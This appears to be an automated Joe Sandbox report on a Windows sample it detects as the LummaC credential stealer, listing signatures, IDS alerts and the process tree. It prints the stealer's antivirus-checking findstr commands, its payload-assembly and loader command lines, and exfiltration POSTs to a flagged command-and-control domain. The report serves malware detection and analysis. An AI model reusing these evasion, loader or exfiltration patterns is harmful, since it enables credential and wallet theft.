Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
LVDdWBGnVE.exe

Overview

General Information

Sample name:LVDdWBGnVE.exe
renamed because original name is a hash value
Original sample name:5a909c9769920208ed3d4d7279f08de5.exe
Analysis ID:1580297
MD5:5a909c9769920208ed3d4d7279f08de5
SHA1:656f447088626150e252cbf7df6f8cd0de596fa0
SHA256:5f2c26e780639a76f10c549e7dea1421c4f06093c1facbf4dd8cf0a8b2fee8cb
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
Drops PE files with a suspicious file extension
Query firmware table information (likely to detect VMs)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication

Classification

Process Tree

  • System is w10x64
  • LVDdWBGnVE.exe (PID: 3652 cmdline: "C:\Users\user\Desktop\LVDdWBGnVE.exe" MD5: 5A909C9769920208ED3D4D7279F08DE5)
    • cmd.exe (PID: 5260 cmdline: "C:\Windows\System32\cmd.exe" /c move Campbell Campbell.cmd & Campbell.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 6552 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 4236 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 1488 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 3048 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 6636 cmdline: cmd /c md 370821 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • findstr.exe (PID: 3052 cmdline: findstr /V "Anchor" Veterinary MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 6196 cmdline: cmd /c copy /b ..\Genre + ..\Mj + ..\Discs + ..\Receiving + ..\Mysterious + ..\Aka w MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Sale.com (PID: 4512 cmdline: Sale.com w MD5: 62D09F076E6E0240548C2F837536A46A)
      • choice.exe (PID: 6184 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Sigma Signatures

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Sigma detected: Search for Antivirus process
      Source: Process startedAuthor: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Campbell Campbell.cmd & Campbell.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5260, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 3048, ProcessName: findstr.exe

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-24T08:58:39.365928+010020283713Unknown Traffic192.168.2.649812104.21.63.229443TCP
      2024-12-24T08:58:41.351835+010020283713Unknown Traffic192.168.2.649818104.21.63.229443TCP
      2024-12-24T08:58:43.594426+010020283713Unknown Traffic192.168.2.649825104.21.63.229443TCP
      2024-12-24T08:58:46.085369+010020283713Unknown Traffic192.168.2.649832104.21.63.229443TCP
      2024-12-24T08:58:48.258563+010020283713Unknown Traffic192.168.2.649838104.21.63.229443TCP
      2024-12-24T08:58:50.677704+010020283713Unknown Traffic192.168.2.649845104.21.63.229443TCP
      2024-12-24T08:58:52.687696+010020283713Unknown Traffic192.168.2.649852104.21.63.229443TCP
      2024-12-24T08:58:55.054859+010020283713Unknown Traffic192.168.2.649860104.21.63.229443TCP
      2024-12-24T08:58:57.814441+010020283713Unknown Traffic192.168.2.649867104.21.63.229443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-24T08:58:40.118283+010020546531A Network Trojan was detected192.168.2.649812104.21.63.229443TCP
      2024-12-24T08:58:42.110697+010020546531A Network Trojan was detected192.168.2.649818104.21.63.229443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-24T08:58:40.118283+010020498361A Network Trojan was detected192.168.2.649812104.21.63.229443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-24T08:58:42.110697+010020498121A Network Trojan was detected192.168.2.649818104.21.63.229443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-24T08:58:44.625392+010020480941Malware Command and Control Activity Detected192.168.2.649825104.21.63.229443TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Antivirus detection for URL or domain
      Source: https://fannleadyn.click/apiAvira URL Cloud: Label: malware
      Multi AV Scanner detection for submitted file
      Source: LVDdWBGnVE.exeVirustotal: Detection: 48%Perma Link
      Source: LVDdWBGnVE.exeReversingLabs: Detection: 42%
      Source: LVDdWBGnVE.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: unknownHTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.6:49812 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.6:49818 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.6:49825 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.6:49832 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.6:49838 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.6:49845 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.6:49852 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.6:49860 version: TLS 1.2
      Source: LVDdWBGnVE.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: C:\Users\user\Desktop\LVDdWBGnVE.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
      Source: C:\Users\user\Desktop\LVDdWBGnVE.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\370821\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\370821Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior

      Networking

      barindex
      Suricata IDS alerts for network traffic
      Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49818 -> 104.21.63.229:443
      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49818 -> 104.21.63.229:443
      Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49825 -> 104.21.63.229:443
      Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49812 -> 104.21.63.229:443
      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49812 -> 104.21.63.229:443
      Source: Joe Sandbox ViewIP Address: 104.21.63.229 104.21.63.229
      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
      Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49818 -> 104.21.63.229:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49812 -> 104.21.63.229:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49825 -> 104.21.63.229:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49838 -> 104.21.63.229:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49852 -> 104.21.63.229:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49832 -> 104.21.63.229:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49860 -> 104.21.63.229:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49867 -> 104.21.63.229:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49845 -> 104.21.63.229:443
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fannleadyn.click
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 76Host: fannleadyn.click
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=LXZNGY6YLEDE7GUUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12838Host: fannleadyn.click
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=6LQUJTI9HZLS6User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15072Host: fannleadyn.click
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=O6UTHR9H31VR2GK8OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19954Host: fannleadyn.click
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=4BMP850K5QEDXVP8FNIUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 5479Host: fannleadyn.click
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=O2J82P19XF4SA63KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1204Host: fannleadyn.click
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=NB4WC9ZEWLCUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 579632Host: fannleadyn.click
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficDNS traffic detected: DNS query: wcCUGXykADNzZuDCbIFIvizjQpm.wcCUGXykADNzZuDCbIFIvizjQpm
      Source: global trafficDNS traffic detected: DNS query: fannleadyn.click
      Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fannleadyn.click
      Source: LVDdWBGnVE.exe, Sale.com.2.dr, Marijuana.0.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
      Source: LVDdWBGnVE.exeString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
      Source: Sale.com.2.dr, Marijuana.0.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
      Source: LVDdWBGnVE.exeString found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
      Source: LVDdWBGnVE.exe, Sale.com.2.dr, Dod.0.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
      Source: Sale.com.2.dr, Marijuana.0.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
      Source: LVDdWBGnVE.exe, Sale.com.2.dr, Marijuana.0.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
      Source: LVDdWBGnVE.exeString found in binary or memory: http://crl.globalsign.com/root.crl0G
      Source: LVDdWBGnVE.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: LVDdWBGnVE.exe, Sale.com.2.dr, Marijuana.0.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
      Source: LVDdWBGnVE.exeString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
      Source: LVDdWBGnVE.exeString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
      Source: LVDdWBGnVE.exeString found in binary or memory: http://ocsp.globalsign.com/rootr103
      Source: LVDdWBGnVE.exeString found in binary or memory: http://ocsp.globalsign.com/rootr30;
      Source: Sale.com.2.dr, Marijuana.0.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
      Source: Sale.com.2.dr, Dod.0.dr, Marijuana.0.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
      Source: LVDdWBGnVE.exe, Sale.com.2.dr, Marijuana.0.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
      Source: LVDdWBGnVE.exeString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
      Source: Sale.com.2.dr, Marijuana.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
      Source: LVDdWBGnVE.exeString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
      Source: LVDdWBGnVE.exe, Sale.com.2.dr, Marijuana.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
      Source: LVDdWBGnVE.exeString found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
      Source: LVDdWBGnVE.exe, 00000000.00000002.2132831072.0000000000420000.00000004.00000001.01000000.00000003.sdmp, Sale.com, 0000000B.00000000.2156670800.00000000008C5000.00000002.00000001.01000000.00000007.sdmp, Sale.com.2.dr, Ejaculation.0.drString found in binary or memory: http://www.autoitscript.com/autoit3/X
      Source: Sale.com.2.dr, Marijuana.0.drString found in binary or memory: https://www.autoitscript.com/autoit3/
      Source: Marijuana.0.drString found in binary or memory: https://www.globalsign.com/repository/0
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
      Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
      Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
      Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
      Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
      Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
      Source: unknownHTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.6:49812 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.6:49818 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.6:49825 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.6:49832 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.6:49838 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.6:49845 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.6:49852 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.6:49860 version: TLS 1.2
      Source: C:\Users\user\Desktop\LVDdWBGnVE.exeCode function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050F9
      Source: C:\Users\user\Desktop\LVDdWBGnVE.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
      Source: C:\Users\user\Desktop\LVDdWBGnVE.exeCode function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,0_2_004038AF
      Source: C:\Users\user\Desktop\LVDdWBGnVE.exeFile created: C:\Windows\KrugerPowersJump to behavior
      Source: C:\Users\user\Desktop\LVDdWBGnVE.exeFile created: C:\Windows\GradVitaminsJump to behavior
      Source: C:\Users\user\Desktop\LVDdWBGnVE.exeFile created: C:\Windows\ScienceComJump to behavior
      Source: C:\Users\user\Desktop\LVDdWBGnVE.exeFile created: C:\Windows\FarmingDesignationJump to behavior
      Source: C:\Users\user\Desktop\LVDdWBGnVE.exeFile created: C:\Windows\OmissionsEmeraldJump to behavior
      Source: C:\Users\user\Desktop\LVDdWBGnVE.exeFile created: C:\Windows\BaconTicketJump to behavior
      Source: C:\Users\user\Desktop\LVDdWBGnVE.exeFile created: C:\Windows\RenewableProgrammeJump to behavior
      Source: C:\Users\user\Desktop\LVDdWBGnVE.exeFile created: C:\Windows\SodiumLegendJump to behavior
      Source: C:\Users\user\Desktop\LVDdWBGnVE.exeCode function: 0_2_0040737E0_2_0040737E
      Source: C:\Users\user\Desktop\LVDdWBGnVE.exeCode function: 0_2_00406EFE0_2_00406EFE
      Source: C:\Users\user\Desktop\LVDdWBGnVE.exeCode function: 0_2_004079A20_2_004079A2
      Source: C:\Users\user\Desktop\LVDdWBGnVE.exeCode function: 0_2_004049A80_2_004049A8
      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\370821\Sale.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
      Source: C:\Users\user\Desktop\LVDdWBGnVE.exeCode function: String function: 004062CF appears 57 times
      Source: LVDdWBGnVE.exeStatic PE information: invalid certificate
      Source: LVDdWBGnVE.exe, 00000000.00000003.2132575704.0000000000722000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs LVDdWBGnVE.exe
      Source: LVDdWBGnVE.exe, 00000000.00000002.2133137192.0000000000722000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs LVDdWBGnVE.exe
      Source: LVDdWBGnVE.exe, 00000000.00000002.2132831072.0000000000420000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameAutoIt3.exeP vs LVDdWBGnVE.exe
      Source: LVDdWBGnVE.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@22/21@2/1
      Source: C:\Users\user\Desktop\LVDdWBGnVE.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
      Source: C:\Users\user\Desktop\LVDdWBGnVE.exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6544:120:WilError_03
      Source: C:\Users\user\Desktop\LVDdWBGnVE.exeFile created: C:\Users\user\AppData\Local\Temp\nsyD092.tmpJump to behavior
      Source: LVDdWBGnVE.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
      Source: C:\Users\user\Desktop\LVDdWBGnVE.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\LVDdWBGnVE.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: LVDdWBGnVE.exeVirustotal: Detection: 48%
      Source: LVDdWBGnVE.exeReversingLabs: Detection: 42%
      Source: C:\Users\user\Desktop\LVDdWBGnVE.exeFile read: C:\Users\user\Desktop\LVDdWBGnVE.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\LVDdWBGnVE.exe "C:\Users\user\Desktop\LVDdWBGnVE.exe"
      Source: C:\Users\user\Desktop\LVDdWBGnVE.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Campbell Campbell.cmd & Campbell.cmd
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 370821
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Anchor" Veterinary
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Genre + ..\Mj + ..\Discs + ..\Receiving + ..\Mysterious + ..\Aka w
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\370821\Sale.com Sale.com w
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
      Source: C:\Users\user\Desktop\LVDdWBGnVE.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Campbell Campbell.cmd & Campbell.cmdJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 370821Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Anchor" Veterinary Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Genre + ..\Mj + ..\Discs + ..\Receiving + ..\Mysterious + ..\Aka wJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\370821\Sale.com Sale.com wJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
      Source: C:\Users\user\Desktop\LVDdWBGnVE.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\LVDdWBGnVE.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\LVDdWBGnVE.exeSection loaded: kernel.appcore.dllJump to behavior
